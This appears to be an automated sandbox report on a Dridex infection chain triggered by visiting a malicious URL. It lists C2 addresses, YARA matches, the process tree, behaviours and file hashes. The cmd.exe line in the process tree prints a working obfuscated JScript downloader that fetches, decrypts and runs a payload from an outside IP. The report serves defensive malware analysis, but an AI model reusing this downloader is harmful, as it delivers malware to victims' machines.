Analysis
max time kernel: 135s
max time network: 146s
platform: windows10_x64
resource: win10v20201028
submitted: 23-03-2021 00:03
Static task: static1
URLScan task: urlscan1
Sample: https://myallexit.xyz/promoexit
General
Malware Config
Extracted
Family: dridex
Botnet: 10111
C2: 188.165.17.91:8443
C2: 81.0.236.90:6601
Signatures
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\g52w7.exe | cryptone
C:\Users\Admin\AppData\Local\Temp\g52w7.exe | cryptone
Processes:
resource | yara_rule
behavioral1/memory/1696-10-0x0000000000400000-0x000000000043D000-memory.dmp | dridex_ldr
behavioral1/memory/1696-12-0x0000000000400000-0x000000000043D000-memory.dmp | dridex_ldr
Blocklisted process makes network request (1 IoCs)
Processes:
flow | pid | process
23 | 452 | wscript.exe
Executes dropped EXE (1 IoCs)
Processes:
pid | process
1696 | g52w7.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Checks whether UAC is enabled
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | g52w7.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious use of FindShellTrayWindow (1 IoCs)
Processes:
pid | process
4808 | iexplore.exe
Suspicious use of SetWindowsHookEx (6 IoCs)
Processes:
pid | process
4808 | iexplore.exe
4808 | iexplore.exe
3672 | IEXPLORE.EXE
3672 | IEXPLORE.EXE
3672 | IEXPLORE.EXE
3672 | IEXPLORE.EXE
Suspicious use of WriteProcessMemory (15 IoCs)
Processes:
description | pid | process | target process
PID 4808 wrote to memory of 3672 | 4808 | iexplore.exe | IEXPLORE.EXE
PID 4808 wrote to memory of 3672 | 4808 | iexplore.exe | IEXPLORE.EXE
PID 4808 wrote to memory of 3672 | 4808 | iexplore.exe | IEXPLORE.EXE
PID 3672 wrote to memory of 4272 | 3672 | IEXPLORE.EXE | cmd.exe
PID 3672 wrote to memory of 4272 | 3672 | IEXPLORE.EXE | cmd.exe
PID 3672 wrote to memory of 4272 | 3672 | IEXPLORE.EXE | cmd.exe
PID 4272 wrote to memory of 452 | 4272 | cmd.exe | wscript.exe
PID 4272 wrote to memory of 452 | 4272 | cmd.exe | wscript.exe
PID 4272 wrote to memory of 452 | 4272 | cmd.exe | wscript.exe
PID 452 wrote to memory of 1420 | 452 | wscript.exe | cmd.exe
PID 452 wrote to memory of 1420 | 452 | wscript.exe | cmd.exe
PID 452 wrote to memory of 1420 | 452 | wscript.exe | cmd.exe
PID 1420 wrote to memory of 1696 | 1420 | cmd.exe | g52w7.exe
PID 1420 wrote to memory of 1696 | 1420 | cmd.exe | g52w7.exe
PID 1420 wrote to memory of 1696 | 1420 | cmd.exe | g52w7.exe
Processes
- C:\Program Files\Internet Explorer\iexplore.exe
  Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://myallexit.xyz/promoexit
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4808 CREDAT:82945 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.97/?MjI3MjQw&nTRrW&s2ht4=Yn6rSCJ2vfzSj2bCIFxj38V7dSTvSgfBOLq1Ubge-jgeELgYOn8xZC1lE87eqzkWNzVafsJOL-UeOZgkW-5WREbIy3F3xzbJFdM0klhWF6jBUxekdVgsU5w4Qn_jPRaLJqRZ0B0ZhVVnNfJ1ypR7BBCPoNTNwsfO-RDp2q-2T8rd3n5Qd&oa1n4=x3rQcvWfaRuPCYjEM_jdTaRGP0zYHliPxYq&NnBMNjA0Mg==" "2"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\wscript.exe
        Command line: wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.97/?MjI3MjQw&nTRrW&s2ht4=Yn6rSCJ2vfzSj2bCIFxj38V7dSTvSgfBOLq1Ubge-jgeELgYOn8xZC1lE87eqzkWNzVafsJOL-UeOZgkW-5WREbIy3F3xzbJFdM0klhWF6jBUxekdVgsU5w4Qn_jPRaLJqRZ0B0ZhVVnNfJ1ypR7BBCPoNTNwsfO-RDp2q-2T8rd3n5Qd&oa1n4=x3rQcvWfaRuPCYjEM_jdTaRGP0zYHliPxYq&NnBMNjA0Mg==" "2"
        - Blocklisted process makes network request
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c g52w7.exe
          - Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Local\Temp\g52w7.exe
            Command line: g52w7.exe
            - Executes dropped EXE
            - Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5: faaba18d915845a4197f76aeaebe341c
  SHA1: 57c6fea245d86a0a5625f0cf41f643e12ddd3025
  SHA256: 71d9635a70526bbaf70924d5c168b0bf66659948af799536c83679cc723e39b2
  SHA512: 811e2495051f20fde19ac11bd8cc32a3e6ffb216f7f68e08ca6868a2ff7ed238d12006482247897252662c7f78bddcef0fbfa9bfdad695e5f49c131d6ddeae0e
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5: ac11cd4c71f0ab7a352ea67ee6cb2696
  SHA1: 656934838466f011f436dbaf3cba4ab61d4eee96
  SHA256: 870563ac3b97652ad666ab3f1435393043b279be7abd664172f8df51314472ed
  SHA512: 34c967e9c8ff408f9eff7fa7d43b5f623c071dd4c162ea48db339c2ece077627826efc1d1aac3109e76d6d7c14d44bcd4e2aa0a2d0bc1492402ea7796c1defc2
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\1LTDIZ32.cookie
  MD5: 7a92c3311741e12d2d8486a53747b43d
  SHA1: 040d75cba19dcf5c54664e493c6fae84870a1f17
  SHA256: b22a3a5a3319facf7b0d3b1cd55336136baba7df05d9b7f8c5883dec8bb10ce3
  SHA512: 50b2b4eb53690993c89cf1bb38693aa25b7b9218fb0cc6b235b4b454d09e16f0c630c791f59729ad3f87359c7c809e11053d25a6e8e1fb0c31d2c7811c0d8457
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\E4RKOR9R.cookie
  MD5: ba1fec0238750980e2ea3e01171888e7
  SHA1: 10060b153c6931ecc75130e509180ea4a088364e
  SHA256: 87e2a23da4c9ee1322f1cee93b8d4aa31ea4294cd6ae374e8acf821daf5c2f89
  SHA512: ca63dd208d584a0535ea878168ed08d7956d6983a31d3e342ee957ebb0a4a498ee43123a2e9d3df9dc58a2bca20e157e7f9f8814ef4f4f7a8f5b7d7bc6e85cf9
- C:\Users\Admin\AppData\Local\Temp\3.tMp
  MD5: 60fc00422b399db85f87d41b8328976d
  SHA1: bb85034acad8025f97e5bb236443debaf8926e4b
  SHA256: c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
  SHA512: 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
- C:\Users\Admin\AppData\Local\Temp\g52w7.exe
  MD5: 63efd90cdf3b9cebab6d80b7ec371ef9
  SHA1: b8bb0ca0bd6d78081070bd1b6df64fbea64b2b18
  SHA256: 8cf2f817709f1f490190f4cd6d242320da96a88774dbda75c1c62d45f442a886
  SHA512: 9ab605e5ed05df23e2b6aa6175646f75a5de68bcb4a4dfe075cf6382728b73e30689ece99d27e3bffcb82fa1bc15db5098d7d990d7b58602fb9ed28bdfcfda58
- memory/452-4-0x0000000000000000-mapping.dmp
- memory/1420-6-0x0000000000000000-mapping.dmp
- memory/1696-10-0x0000000000400000-0x000000000043D000-memory.dmp (Filesize: 244KB)
- memory/1696-12-0x0000000000400000-0x000000000043D000-memory.dmp (Filesize: 244KB)
- memory/1696-11-0x0000000002040000-0x000000000207C000-memory.dmp (Filesize: 240KB)
- memory/1696-7-0x0000000000000000-mapping.dmp
- memory/3672-2-0x0000000000000000-mapping.dmp
- memory/4272-3-0x0000000000000000-mapping.dmp